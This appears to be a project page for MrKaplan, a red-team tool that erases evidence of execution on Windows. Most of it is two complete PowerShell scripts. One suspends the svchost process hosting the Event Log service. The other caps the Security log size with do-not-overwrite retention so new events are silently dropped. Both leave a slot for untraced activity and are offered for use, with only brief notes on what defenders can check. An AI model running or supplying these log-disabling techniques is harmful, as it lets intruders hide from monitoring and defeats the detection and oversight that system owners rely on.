MrKaplan: tool for red teamers to stay hidden by clearing evidence of execution
Mr.Kaplan
The biggest problem for any attacker is Windows event logging: the Event Log service together with the ETW (Event Tracing for Windows) providers that feed it. Almost every well-known blue-team agent (Sysmon, Wazuh, etc.) relies on it, so if you manage to disable this service no logs are produced and nothing can trigger an alert for the blue team. Disabling it requires administrative privileges. This page covers the methods implemented in MrKaplan to disable event logging and how to use them with MrKaplan.
MrKaplan is a tool that helps red teamers stay hidden by clearing evidence of execution. It works by recording information such as the time it ran and a snapshot of files, and by associating each piece of evidence with the user it belongs to.
This tool is inspired by MoonWalk, a similar tool for Unix machines.
Methods available
Suspending the event logger’s process
This is a common and easy way to stop event logging: suspend the process that hosts the Event Log service (an svchost.exe instance). It can be done with a WMI query to find the service's PID followed by a call to NtSuspendProcess. The Service Control Manager will not try to restart the service, because from its point of view the process is still running, yet no events are written. A win-win situation for any attacker.
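The procedure above as an added PowerShell example (this is not MrKaplan's code): a Win32_Service query returns the PID hosting the EventLog service, OpenProcess with PROCESS_SUSPEND_RESUME plus NtSuspendProcess freezes it, and NtResumeProcess undoes it at cleanup time. The function and namespace names are my own; the session is assumed to be elevated.

```powershell
# Added example (not MrKaplan's code): locate the svchost.exe hosting the Event Log service,
# suspend it with NtSuspendProcess, and resume it afterwards. Needs an elevated session.

Add-Type -Namespace EventLogDemo -Name Native -MemberDefinition @'
[DllImport("ntdll.dll")]
public static extern int NtSuspendProcess(IntPtr processHandle);
[DllImport("ntdll.dll")]
public static extern int NtResumeProcess(IntPtr processHandle);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern IntPtr OpenProcess(uint desiredAccess, bool inheritHandle, uint processId);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool CloseHandle(IntPtr handle);
'@

$PROCESS_SUSPEND_RESUME = 0x0800   # the only access right NtSuspendProcess/NtResumeProcess need

function Get-EventLogServicePid {
    # The WMI query: Win32_Service exposes the PID of the process hosting a service.
    $svc = Get-CimInstance -ClassName Win32_Service -Filter "Name='EventLog'"
    if (-not $svc -or $svc.ProcessId -eq 0) { throw 'The EventLog service is not running.' }
    [uint32]$svc.ProcessId
}

function Get-CoHostedServices {
    param([Parameter(Mandatory)][uint32]$ProcessId)
    # Every service sharing this svchost freezes with it. Windows groups services into
    # shared hosts on machines with little RAM, so check before suspending.
    (Get-CimInstance -ClassName Win32_Service -Filter "ProcessId=$ProcessId").Name
}

function Set-ProcessSuspended {
    param([Parameter(Mandatory)][uint32]$ProcessId, [Parameter(Mandatory)][bool]$Suspend)
    $h = [EventLogDemo.Native]::OpenProcess($PROCESS_SUSPEND_RESUME, $false, $ProcessId)
    if ($h -eq [IntPtr]::Zero) {
        throw "OpenProcess failed, Win32 error $([Runtime.InteropServices.Marshal]::GetLastWin32Error())"
    }
    try {
        if ($Suspend) { $op = 'NtSuspendProcess'; $status = [EventLogDemo.Native]::NtSuspendProcess($h) }
        else          { $op = 'NtResumeProcess';  $status = [EventLogDemo.Native]::NtResumeProcess($h) }
        # NTSTATUS 0 is STATUS_SUCCESS; anything else is an error code.
        if ($status -ne 0) { throw ('{0} returned NTSTATUS 0x{1:X8}' -f $op, $status) }
    } finally {
        [void][EventLogDemo.Native]::CloseHandle($h)
    }
}

function Test-ProcessSuspended {
    param([Parameter(Mandatory)][uint32]$ProcessId)
    # What a defender can check: every thread of a suspended process sits in Wait/Suspended.
    $threads = (Get-Process -Id $ProcessId).Threads
    $frozen = @($threads | Where-Object { $_.ThreadState -eq 'Wait' -and $_.WaitReason -eq 'Suspended' })
    $frozen.Count -eq $threads.Count
}

$eventLogPid = Get-EventLogServicePid
"EventLog runs in PID $eventLogPid together with: $((Get-CoHostedServices -ProcessId $eventLogPid) -join ', ')"

Set-ProcessSuspended -ProcessId $eventLogPid -Suspend $true
# The SCM still sees a live process, so the service stays 'Running' while nothing gets written.
"Service status: $((Get-Service -Name EventLog).Status); suspended: $(Test-ProcessSuspended -ProcessId $eventLogPid)"

# ... activity that should leave no event log trace goes here ...

Set-ProcessSuspended -ProcessId $eventLogPid -Suspend $false
```

Two things worth keeping in mind when using this: the co-hosted services list should contain only EventLog, otherwise those services freeze too and that is visible to users; and the thread-state check is exactly what a hunting query on the blue side can run, so the window between suspend and resume should be as short as possible.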
Overwrite event logging settings
The second method is my favorite, but it comes with a sting: from the moment it is applied until cleanup, no regular user can log in to the workstation. For this method, MrKaplan (ab)uses a Windows mechanism that limits the size of each log on the computer. To stop logging, all that needs to be done is to set the log's maximum size registry value to 0 KB and its retention setting to DoNotOverWrite. This last part is important: by default new events overwrite the oldest ones once the log is full, but with DoNotOverWrite the full log is kept as it is and new events are simply dropped, so nothing gets recorded.
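The size-plus-retention trick as an added PowerShell example (this is not MrKaplan's code, which may write the registry directly). It snapshots a log's current configuration, applies a tiny size cap with retention set to "do not overwrite" through the documented wevtutil set-log interface, shows the state a defender would see with Get-WinEvent -ListLog, and restores the original settings. The legacy registry location it reads (HKLM\SYSTEM\CurrentControlSet\Services\EventLog\<log>, values MaxSize and Retention) is the one documented by Microsoft; the function names and the 1 MB minimum are my assumptions.

```powershell
# Added example (not MrKaplan's code): cap a log's size and switch it to "do not overwrite",
# verify the effect, then restore the original settings. Needs an elevated session.
# Legacy configuration location (documented by Microsoft):
#   HKLM\SYSTEM\CurrentControlSet\Services\EventLog\<log>
#   MaxSize (REG_DWORD, bytes)   Retention (REG_DWORD, 0xFFFFFFFF = do not overwrite)

function Get-LogRetentionState {
    param([Parameter(Mandatory)][string]$LogName)
    $cfg = Get-WinEvent -ListLog $LogName
    $reg = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\EventLog\$LogName" `
                            -Name MaxSize, Retention -ErrorAction SilentlyContinue
    [pscustomobject]@{
        LogName      = $cfg.LogName
        MaxBytes     = $cfg.MaximumSizeInBytes
        LogMode      = $cfg.LogMode          # Circular = overwrite as needed, Retain = do not overwrite
        IsLogFull    = $cfg.IsLogFull        # True once Retain mode has started dropping events
        RegMaxSize   = $reg.MaxSize
        RegRetention = if ($null -ne $reg.Retention) { '0x{0:X8}' -f $reg.Retention } else { $null }
    }
}

function Set-LogRetentionState {
    param(
        [Parameter(Mandatory)][string]$LogName,
        [Parameter(Mandatory)][uint64]$MaxBytes,
        [Parameter(Mandatory)][bool]$DoNotOverwrite
    )
    # wevtutil set-log: /ms = maximum size in bytes, /rt:true = retain (do not overwrite),
    # /rt:false = overwrite as needed. It updates the stored configuration for us.
    $rt = if ($DoNotOverwrite) { 'true' } else { 'false' }
    & wevtutil.exe set-log $LogName "/ms:$MaxBytes" "/rt:$rt"
    if ($LASTEXITCODE -ne 0) { throw "wevtutil set-log failed with exit code $LASTEXITCODE" }
}

$log = 'Security'

# 1. Snapshot the current configuration so the change can be reverted (the "cleanup" step).
$before = Get-LogRetentionState -LogName $log
$before

# 2. Shrink the log and forbid overwriting. Assumption: 1 MB is the smallest size this
#    Windows build accepts (the Event Viewer dialog refuses smaller values). Once the log's
#    current usage exceeds the cap, IsLogFull flips to True and new events are dropped.
Set-LogRetentionState -LogName $log -MaxBytes 1MB -DoNotOverwrite $true
Get-LogRetentionState -LogName $log

# ... activity that should leave no event log trace goes here ...

# 3. Cleanup: put the original size and mode back.
Set-LogRetentionState -LogName $log -MaxBytes $before.MaxBytes -DoNotOverwrite ($before.LogMode -eq 'Retain')
```

The RegRetention field is the quick tell for either side: 0xFFFFFFFF on a log that normally runs in Circular mode is exactly the kind of change a configuration-drift check should flag, which is why the snapshot and the restore step matter as much as the change itself.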
Features
- Stopping event logging.
- Clearing file artifacts.
- Clearing registry artifacts.
- Can run for multiple users.
- Can run as user and as admin (highly recommended to run as admin).
- Can save timestamps of files.
- Can exclude certain operations and leave artifacts to blue teams.
Download & Use
Copyright (c) 2022, Ido Veltzman
All rights reserved.